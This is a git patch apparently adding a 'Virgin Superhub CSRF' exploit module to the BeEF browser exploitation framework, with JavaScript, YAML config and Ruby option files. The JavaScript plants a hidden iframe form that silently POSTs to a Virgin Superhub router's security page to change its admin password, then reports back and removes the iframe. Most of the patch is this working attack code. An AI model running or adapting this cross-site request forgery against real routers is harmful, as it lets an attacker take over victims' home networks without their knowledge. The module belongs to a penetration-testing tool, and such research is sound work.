From 771d6d60f9cb077c62e6d163e3ac7e1a8c89576f Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 24 Jun 2012 15:22:35 +0930
Subject: [PATCH] Added Virgin Superhub CSRF module

Fixes issue #703
---
 .../router/virgin_superhub_csrf/command.js    | 35 +++++++++++++++++++
 .../router/virgin_superhub_csrf/config.yaml   | 25 +++++++++++++
 .../router/virgin_superhub_csrf/module.rb     | 29 +++++++++++++++
 3 files changed, 89 insertions(+)
 create mode 100644 modules/exploits/router/virgin_superhub_csrf/command.js
 create mode 100644 modules/exploits/router/virgin_superhub_csrf/config.yaml
 create mode 100644 modules/exploits/router/virgin_superhub_csrf/module.rb

diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js
new file mode 100644
index 000000000..5acb91421
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/command.js
@@ -0,0 +1,35 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var gateway = '<%= @base %>'; 
+	var passwd  = '<%= @password %>';
+
+	var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "/goform/RgSecurity", "POST", [
+		{'type':'hidden', 'name':'NetgearPassword', 'value':passwd} ,
+		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
+		{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	cleanup = function() {
+		document.body.removeChild(virgin_superhub_iframe);
+	}
+	setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml
new file mode 100644
index 000000000..11c11a548
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        virgin_superhub_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Virgin Superhub CSRF"
+            description: "Attempts to change the admin password on a Virgin Superhub router."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb
new file mode 100644
index 000000000..8a2e5a2d1
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/module.rb
@@ -0,0 +1,29 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Virgin_superhub_csrf < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.254/'}, 
+			{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end